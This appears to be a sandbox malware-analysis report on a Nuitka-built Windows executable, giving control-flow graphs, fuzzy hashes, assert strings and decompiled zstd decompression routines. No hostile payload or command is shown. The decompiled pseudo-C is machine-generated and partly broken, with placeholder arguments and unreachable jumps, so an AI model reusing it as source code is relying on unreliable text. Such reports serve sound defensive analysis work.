                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 784 403120-403152 785 403154-403193 memcpy call 403120 784->785 786 4031b8-4031ec memset 784->786 788 4031a3-4031b3 785->788 792 403195-40319f 785->792 786->788 789 4031ee-403236 786->789 791 4032c0-4032d9 789->791 793 403240-403247 791->793 794 4032df-4032f6 791->794 792->788 795 4032fc-403300 793->795 796 40324d 793->796 794->795 794->796 797 403302-403321 _assert 795->797 798 403326-403329 795->798 799 403250-403264 796->799 797->798 798->799 800 403330-403354 _assert 799->800 801 40326a-40326c 799->801 800->801 802 403285-40328a 801->802 803 40326e-403271 801->803 804 403460 802->804 806 403290-4032a2 802->806 803->804 805 403277-403283 803->805 807 403463-40346d 804->807 805->802 808 403438-40343d 806->808 809 4032a8-4032ab 806->809 807->788 811 403473-40347f 807->811 808->809 810 403443-403453 808->810 812 4032ae-4032b7 809->812 810->812 811->788 815 403485-40348f 811->815 813 403360-40337e 812->813 814 4032bd 812->814 816 403380 813->816 817 40338b-403392 813->817 814->791 815->788 818 403495-4034b8 815->818 819 4033b9-4033d3 816->819 820 403418-40342c 817->820 821 403398-40339f 817->821 818->788 823 4034e0-403509 _assert 819->823 824 4033d9-4033e4 819->824 822 4033a1-4033b7 820->822 821->822 822->819 825 403388 822->825 828 403518-40351d 823->828 826 403537-40353d 824->826 827 4033ea-4033f8 824->827 825->817 826->807 827->828 829 4033fe-403401 827->829 828->829 830 403523-403532 828->830 831 4034c0-4034da _assert 829->831 832 403407 829->832 833 40340a-40340e 830->833 831->832 832->833 833->820
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assertmemcpymemset
                                                                                                                                                                • String ID: (bitCount >> 3) <= 3$(bitStream & 3) < 3$C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/entropy_common.c$count == -1$threshold > 1
                                                                                                                                                                • API String ID: 951691328-1972499916
                                                                                                                                                                • Opcode ID: f4a3c4e0a0f8b99ce230efd95a505887ab17647a83c64ec131ec507a51b6cca2
                                                                                                                                                                • Instruction ID: 3af6e9bf1622fd9dc55c73f1e24f50957c5d69d8b2704a892ef3e0034c8550da
                                                                                                                                                                • Opcode Fuzzy Hash: f4a3c4e0a0f8b99ce230efd95a505887ab17647a83c64ec131ec507a51b6cca2
                                                                                                                                                                • Instruction Fuzzy Hash: 5791467271868492DB24CF15E84035E7B25F385BA5F40832ADF6A1BBD4DB3CCA49CB48
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Failed to send CTRL-C to child process., xrefs: 00403D67
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: puts$CloseConsoleCtrlErrorEventFormatGenerateHandleLastMessageObjectProcessSingleWait
                                                                                                                                                                • String ID: Failed to send CTRL-C to child process.
                                                                                                                                                                • API String ID: 3725852347-1574864964
                                                                                                                                                                • Opcode ID: 58c5650803b227a57b093dbd143f00534e9717872a97dc5eaab3ba8b10ec1946
                                                                                                                                                                • Instruction ID: 26a3bc8c24f7d27d5c9a78b306cf113a0ae9ba3d695160d5e98c584babd3a35e
                                                                                                                                                                • Opcode Fuzzy Hash: 58c5650803b227a57b093dbd143f00534e9717872a97dc5eaab3ba8b10ec1946
                                                                                                                                                                • Instruction Fuzzy Hash: 53216FB2614A4086FB10CF20F81531A77B0FB85759F905229EB8A977A4DF3DC659CB08
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 878 41dbf0-41dc0a 879 41dc0c 878->879 880 41dc1e-41dc3e 878->880 881 41dc10-41dc1c 879->881 882 41dc44 880->882 883 41dcde-41dcee 880->883 881->880 881->881 884 41dc48-41dc54 882->884 885 41dc56 884->885 886 41dc6e-41dc71 884->886 887 41dc60-41dc6c 885->887 888 426474-426485 abort * 3 886->888 889 41dc77-41dc9f wcslen mbstowcs 886->889 887->886 887->887 895 426490 888->895 890 41dca1-41dcbf _assert 889->890 891 41dcd0-41dcdc 889->891 890->883 893 41dcc1-41dcc4 890->893 891->883 891->893 893->884 895->895
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • res == 1, xrefs: 0041DCAE
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\static_src/HelpersSafeStrings.c, xrefs: 0041DC34
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assertmbstowcswcslen
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\static_src/HelpersSafeStrings.c$res == 1
                                                                                                                                                                • API String ID: 1857258003-1877585308
                                                                                                                                                                • Opcode ID: c36487fe49334edcd11ebdd495428ea70484884b613d889f0026ffbea020cd98
                                                                                                                                                                • Instruction ID: c408769ffee888b10102f0c260c1b348419694bba7b1d61961c5430e6ce37008
                                                                                                                                                                • Opcode Fuzzy Hash: c36487fe49334edcd11ebdd495428ea70484884b613d889f0026ffbea020cd98
                                                                                                                                                                • Instruction Fuzzy Hash: B62146B3B015A084DA219B26BC413BBAA60BB45B98F8C8912EF8907355E77DC5D1D348
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 29%
                                                                                                                                                                			E00402510(signed long long __rcx, void* __rdx, signed long long __r8, signed long long __r9, intOrPtr _a40, long long* _a48, intOrPtr _a56, intOrPtr _a64, intOrPtr _a72, intOrPtr _a80) {
                                                                                                                                                                				long long _v88;
                                                                                                                                                                				void* _t22;
                                                                                                                                                                				signed int _t24;
                                                                                                                                                                				signed long long _t44;
                                                                                                                                                                				void* _t47;
                                                                                                                                                                				signed long long _t66;
                                                                                                                                                                				void* _t67;
                                                                                                                                                                				intOrPtr _t69;
                                                                                                                                                                				signed long long _t78;
                                                                                                                                                                				void* _t79;
                                                                                                                                                                				signed long long _t80;
                                                                                                                                                                				signed long long _t82;
                                                                                                                                                                
                                                                                                                                                                				_t79 = __r8 + __r9;
                                                                                                                                                                				_t78 = __rcx;
                                                                                                                                                                				_t67 = __rdx;
                                                                                                                                                                				_t44 = __r8;
                                                                                                                                                                				_t66 = __r9;
                                                                                                                                                                				if(_t79 > __rdx - __rcx) {
                                                                                                                                                                					_t79 = 0xffffffba;
                                                                                                                                                                				} else {
                                                                                                                                                                					_t69 =  *_a48;
                                                                                                                                                                					if(_a56 - _t69 < __r8) {
                                                                                                                                                                						L11:
                                                                                                                                                                						_t79 = 0xffffffec;
                                                                                                                                                                					} else {
                                                                                                                                                                						if(_t79 <= 0) {
                                                                                                                                                                							r8d = 0x30b;
                                                                                                                                                                							__imp___assert();
                                                                                                                                                                							_t80 = __rcx + __r8;
                                                                                                                                                                							if(_t80 < __rcx + _t79) {
                                                                                                                                                                								goto L4;
                                                                                                                                                                							} else {
                                                                                                                                                                								goto L10;
                                                                                                                                                                							}
                                                                                                                                                                							L16:
                                                                                                                                                                						} else {
                                                                                                                                                                							_t80 = __rcx + __r8;
                                                                                                                                                                							if(_t80 >= __rcx + _t79) {
                                                                                                                                                                								L10:
                                                                                                                                                                								r8d = 0x30c;
                                                                                                                                                                								__imp___assert();
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						L4:
                                                                                                                                                                						_t68 = _t67 - 0x20;
                                                                                                                                                                						_v88 = 0;
                                                                                                                                                                						_t82 = _t80 - _a40;
                                                                                                                                                                						_t22 = E004018B0(_t24, _t78, _t67 - 0x20,  *_a48, _t44);
                                                                                                                                                                						 *_a48 = _t44 + _t69;
                                                                                                                                                                						if(_t80 - _a64 >= _a40) {
                                                                                                                                                                							L8:
                                                                                                                                                                							_v88 = 1;
                                                                                                                                                                							_t22 = E004018B0(_t24, _t80, _t68, _t82, _t66);
                                                                                                                                                                						} else {
                                                                                                                                                                							if(_t80 - _a72 < _a40) {
                                                                                                                                                                								goto L11;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t47 = _a64 - _t82;
                                                                                                                                                                								if(_a80 >= _a80 - _t47 + _t66) {
                                                                                                                                                                									L004259A8();
                                                                                                                                                                								} else {
                                                                                                                                                                									_t80 = _t80 + _t47;
                                                                                                                                                                									_t66 = _t66 - _t47;
                                                                                                                                                                									memcpy(??, ??, ??);
                                                                                                                                                                									_t82 = _a64;
                                                                                                                                                                									goto L8;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				return _t22;
                                                                                                                                                                				goto L16;
                                                                                                                                                                			}















                                                                                                                                                                0x00402523
                                                                                                                                                                0x00402527
                                                                                                                                                                0x0040252a
                                                                                                                                                                0x00402530
                                                                                                                                                                0x00402533
                                                                                                                                                                0x00402539
                                                                                                                                                                0x00402690
                                                                                                                                                                0x0040253f
                                                                                                                                                                0x00402547
                                                                                                                                                                0x00402558
                                                                                                                                                                0x00402680
                                                                                                                                                                0x00402680
                                                                                                                                                                0x0040255e
                                                                                                                                                                0x00402561
                                                                                                                                                                0x004026a0
                                                                                                                                                                0x004026b4
                                                                                                                                                                0x004026ba
                                                                                                                                                                0x004026c5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004026cb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004026cb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00402567
                                                                                                                                                                0x00402567
                                                                                                                                                                0x00402572
                                                                                                                                                                0x00402658
                                                                                                                                                                0x00402658
                                                                                                                                                                0x0040266c
                                                                                                                                                                0x0040266c
                                                                                                                                                                0x00402572
                                                                                                                                                                0x00402578
                                                                                                                                                                0x00402578
                                                                                                                                                                0x00402593
                                                                                                                                                                0x0040259b
                                                                                                                                                                0x004025a6
                                                                                                                                                                0x004025be
                                                                                                                                                                0x004025c9
                                                                                                                                                                0x00402625
                                                                                                                                                                0x00402631
                                                                                                                                                                0x00402639
                                                                                                                                                                0x004025cb
                                                                                                                                                                0x004025de
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004025e4
                                                                                                                                                                0x004025f4
                                                                                                                                                                0x00402606
                                                                                                                                                                0x004026d6
                                                                                                                                                                0x0040260c
                                                                                                                                                                0x00402612
                                                                                                                                                                0x00402615
                                                                                                                                                                0x00402618
                                                                                                                                                                0x0040261d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0040261d
                                                                                                                                                                0x00402606
                                                                                                                                                                0x004025de
                                                                                                                                                                0x004025c9
                                                                                                                                                                0x00402558
                                                                                                                                                                0x00402651
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • oLitEnd < op + sequenceLength, xrefs: 00402665
                                                                                                                                                                • op < op + sequenceLength, xrefs: 004026AD
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 0040265E, 004026A6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert$memcpy
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$oLitEnd < op + sequenceLength$op < op + sequenceLength
                                                                                                                                                                • API String ID: 3718630003-1171129319
                                                                                                                                                                • Opcode ID: a243a890a93b320ef62eb829d641569206126378104e41c77a436590a373585a
                                                                                                                                                                • Instruction ID: ab7253468d8d43162a6f12f4ea535ebc783056ae43e23541e1e663cacb058784
                                                                                                                                                                • Opcode Fuzzy Hash: a243a890a93b320ef62eb829d641569206126378104e41c77a436590a373585a
                                                                                                                                                                • Instruction Fuzzy Hash: 5A31D172301A8595CE208F16E94878AA325F745BE8F8486239E5D27BE4DF7CC18AC709
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00403C1D, 00403C3A
                                                                                                                                                                • nbBits >= 1, xrefs: 00403C24, 00403C44
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits >= 1
                                                                                                                                                                • API String ID: 1222420520-1700488978
                                                                                                                                                                • Opcode ID: 6cda7741e3223f243d8f38b496d595a1d6d695456e76b8893a1d2e24c763784c
                                                                                                                                                                • Instruction ID: 586a5bf4666f3d3b6ee6da93f78d6d56bea81cb9c186b6504a3382d6887de9de
                                                                                                                                                                • Opcode Fuzzy Hash: 6cda7741e3223f243d8f38b496d595a1d6d695456e76b8893a1d2e24c763784c
                                                                                                                                                                • Instruction Fuzzy Hash: 2511A173300998A6D714DF26E840B5A7B61F344F99F49802AEF59477A4DE38C98AD344
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                			E00403970(void* __esi, signed int __rcx, long long* __rdx, void* __rbp, void* __r11, void* __r13, void* __r14, void* __r15, char _a32, intOrPtr _a40, signed char* _a48, long long _a56, long long _a64, long long _a72, long long _a80, intOrPtr _a88, intOrPtr _a96, long long _a104, long long _a112, intOrPtr _a120) {
                                                                                                                                                                				char _v152;
                                                                                                                                                                				char _v156;
                                                                                                                                                                				long long _v176;
                                                                                                                                                                				long long _v192;
                                                                                                                                                                				long long _v200;
                                                                                                                                                                				long long _v208;
                                                                                                                                                                				long long _v216;
                                                                                                                                                                				void* __rbx;
                                                                                                                                                                				void* __rdi;
                                                                                                                                                                				void* __rsi;
                                                                                                                                                                				void* __r12;
                                                                                                                                                                				void* _t38;
                                                                                                                                                                				void* _t39;
                                                                                                                                                                				void* _t40;
                                                                                                                                                                				void* _t41;
                                                                                                                                                                				signed int _t42;
                                                                                                                                                                				long long _t48;
                                                                                                                                                                				void* _t54;
                                                                                                                                                                				long long* _t64;
                                                                                                                                                                				signed long long _t70;
                                                                                                                                                                				long long _t74;
                                                                                                                                                                				signed int _t75;
                                                                                                                                                                				signed long long _t79;
                                                                                                                                                                				void* _t81;
                                                                                                                                                                				long long _t82;
                                                                                                                                                                				long long _t83;
                                                                                                                                                                				long long _t89;
                                                                                                                                                                				signed int _t91;
                                                                                                                                                                
                                                                                                                                                                				_a32 = r9d;
                                                                                                                                                                				_t83 = __rcx;
                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                				if(r8d == 2) {
                                                                                                                                                                					_t48 = _a56;
                                                                                                                                                                					_t91 =  &_v152;
                                                                                                                                                                					_v216 = _t48;
                                                                                                                                                                					_t39 = E00403120(_t48, _t91,  &_a32,  &_v156, _a48);
                                                                                                                                                                					if(_t48 <= 0xffffff88) {
                                                                                                                                                                						_t74 = _v156;
                                                                                                                                                                						if(_a40 >= _t74) {
                                                                                                                                                                							_v176 = _t48;
                                                                                                                                                                							_v208 = _t74;
                                                                                                                                                                							_t75 = _t91;
                                                                                                                                                                							r8d = _a32;
                                                                                                                                                                							_v192 = 0x800;
                                                                                                                                                                							_v200 = _a112;
                                                                                                                                                                							_t51 = _a72;
                                                                                                                                                                							_t89 = _a64;
                                                                                                                                                                							_v216 = _a72;
                                                                                                                                                                							if(_a120 != 0) {
                                                                                                                                                                								_t40 = L004026E0(_t64, __rcx, _t75, _t81, __rcx, __rbp, _t91, __r13, __r14, __r15);
                                                                                                                                                                							} else {
                                                                                                                                                                								_t40 = E00402C00(_t51, __rcx, _t75,  &_v156, _t89);
                                                                                                                                                                							}
                                                                                                                                                                							 *_t64 = _t83;
                                                                                                                                                                							return _t40;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					return _t39;
                                                                                                                                                                				} else {
                                                                                                                                                                					if(r8d == 3) {
                                                                                                                                                                						r9d = _a88;
                                                                                                                                                                						_t54 = 0xffffffec;
                                                                                                                                                                						if(r9d == 0) {
                                                                                                                                                                							goto L4;
                                                                                                                                                                						} else {
                                                                                                                                                                							r8d = _a96;
                                                                                                                                                                							if(r8d != 0 && _a104 > 0x18) {
                                                                                                                                                                								_t79 = _t42 << 3;
                                                                                                                                                                								do {
                                                                                                                                                                									asm("inc ecx");
                                                                                                                                                                									_t54 = _t54 + 0x40;
                                                                                                                                                                								} while (_t79 > _t54);
                                                                                                                                                                							}
                                                                                                                                                                							return _t38;
                                                                                                                                                                						}
                                                                                                                                                                					} else {
                                                                                                                                                                						if(r8d != 1) {
                                                                                                                                                                							 *__rdx = _a80;
                                                                                                                                                                							return _t38;
                                                                                                                                                                						}
                                                                                                                                                                						if(_a56 == 0) {
                                                                                                                                                                							L4:
                                                                                                                                                                							return _t38;
                                                                                                                                                                						} else {
                                                                                                                                                                							_t70 =  *_a48 & 0x000000ff;
                                                                                                                                                                							if(_t41 > r9d) {
                                                                                                                                                                								goto L4;
                                                                                                                                                                							} else {
                                                                                                                                                                								r10d = 0;
                                                                                                                                                                								_t82 =  *((intOrPtr*)(_a64 + _t70 * 4));
                                                                                                                                                                								r12d =  *((intOrPtr*)(_a72 + _t70 * 4));
                                                                                                                                                                								 *((long long*)(__rcx)) = 0;
                                                                                                                                                                								 *((char*)(__rcx + 0xb)) = 0;
                                                                                                                                                                								 *((intOrPtr*)(__rcx + 8)) = r10w;
                                                                                                                                                                								if(r12d > 0xfe) {
                                                                                                                                                                									r8d = 0x165;
                                                                                                                                                                									__imp___assert();
                                                                                                                                                                								}
                                                                                                                                                                								 *((long long*)(_t83 + 0xc)) = _t82;
                                                                                                                                                                								 *_t64 = _t83;
                                                                                                                                                                								return _t38;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                			}































                                                                                                                                                                0x0040397c
                                                                                                                                                                0x00403984
                                                                                                                                                                0x00403987
                                                                                                                                                                0x0040398e
                                                                                                                                                                0x004039c0
                                                                                                                                                                0x004039c8
                                                                                                                                                                0x004039e5
                                                                                                                                                                0x004039ea
                                                                                                                                                                0x004039f3
                                                                                                                                                                0x004039f9
                                                                                                                                                                0x00403a04
                                                                                                                                                                0x00403a0a
                                                                                                                                                                0x00403a1e
                                                                                                                                                                0x00403a22
                                                                                                                                                                0x00403a27
                                                                                                                                                                0x00403a32
                                                                                                                                                                0x00403a3b
                                                                                                                                                                0x00403a40
                                                                                                                                                                0x00403a48
                                                                                                                                                                0x00403a50
                                                                                                                                                                0x00403a55
                                                                                                                                                                0x00403b80
                                                                                                                                                                0x00403a5b
                                                                                                                                                                0x00403a5b
                                                                                                                                                                0x00403a60
                                                                                                                                                                0x00403a65
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00403a65
                                                                                                                                                                0x00403a04
                                                                                                                                                                0x00403b7b
                                                                                                                                                                0x00403990
                                                                                                                                                                0x00403994
                                                                                                                                                                0x00403af8
                                                                                                                                                                0x00403b00
                                                                                                                                                                0x00403b0a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00403b10
                                                                                                                                                                0x00403b10
                                                                                                                                                                0x00403b1b
                                                                                                                                                                0x00403b41
                                                                                                                                                                0x00403b48
                                                                                                                                                                0x00403b48
                                                                                                                                                                0x00403b4d
                                                                                                                                                                0x00403b51
                                                                                                                                                                0x00403b48
                                                                                                                                                                0x00403b64
                                                                                                                                                                0x00403b64
                                                                                                                                                                0x0040399a
                                                                                                                                                                0x0040399e
                                                                                                                                                                0x004039ac
                                                                                                                                                                0x00000000
                                                                                                                                                                0x004039af
                                                                                                                                                                0x00403a80
                                                                                                                                                                0x004039bd
                                                                                                                                                                0x004039bd
                                                                                                                                                                0x00403a86
                                                                                                                                                                0x00403a8e
                                                                                                                                                                0x00403a9b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00403aa1
                                                                                                                                                                0x00403aa9
                                                                                                                                                                0x00403aac
                                                                                                                                                                0x00403ab7
                                                                                                                                                                0x00403abb
                                                                                                                                                                0x00403ac2
                                                                                                                                                                0x00403ac6
                                                                                                                                                                0x00403ad2
                                                                                                                                                                0x00403b90
                                                                                                                                                                0x00403ba4
                                                                                                                                                                0x00403ba4
                                                                                                                                                                0x00403ae1
                                                                                                                                                                0x00403ae4
                                                                                                                                                                0x00403af3
                                                                                                                                                                0x00403af3
                                                                                                                                                                0x00403a9b
                                                                                                                                                                0x00403a80
                                                                                                                                                                0x00403994

                                                                                                                                                                Strings
                                                                                                                                                                • nbAddBits < 255, xrefs: 00403B9D
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c, xrefs: 00403B96
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/decompress/zstd_decompress_block.c$nbAddBits < 255
                                                                                                                                                                • API String ID: 0-3056615513
                                                                                                                                                                • Opcode ID: f22e65523406048f1c9523df0c218a099b79b7d20c1e6802200349cd87e2cb39
                                                                                                                                                                • Instruction ID: fa81a0e2a2bf077a5be58c560dabec3db921ecff2793570a204e0c5e67cfc55f
                                                                                                                                                                • Opcode Fuzzy Hash: f22e65523406048f1c9523df0c218a099b79b7d20c1e6802200349cd87e2cb39
                                                                                                                                                                • Instruction Fuzzy Hash: AA519E72218A8481DB758F19F44079ABB64F389BB5F448326DFA917BD9DB7CC184CB04
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h, xrefs: 00403F1E
                                                                                                                                                                • nbBits < BIT_MASK_SIZE, xrefs: 00403F25
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.234542689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.234535818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234552756.0000000000428000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234560655.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.234568049.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _assert
                                                                                                                                                                • String ID: C:\Users\mac\Desktop\STINK-~1.0\STINK-~1.0\venv\lib\SITE-P~1\nuitka\build\inline_copy\zstd/common/bitstream.h$nbBits < BIT_MASK_SIZE
                                                                                                                                                                • API String ID: 1222420520-2490357055
                                                                                                                                                                • Opcode ID: a7ba3bb28429133b96e605709d6a51d8c39e78303f0002dedfd4302f378de472
                                                                                                                                                                • Instruction ID: 74f4c7b778ed2a250ddbf091dcec4506a164404ee4a6a8557df480005c09b7c6
                                                                                                                                                                • Opcode Fuzzy Hash: a7ba3bb28429133b96e605709d6a51d8c39e78303f0002dedfd4302f378de472
                                                                                                                                                                • Instruction Fuzzy Hash: 3621B6B2710A8586D708CF25E84475D77A5F308FC8F448136EF495B384DB78C994C384
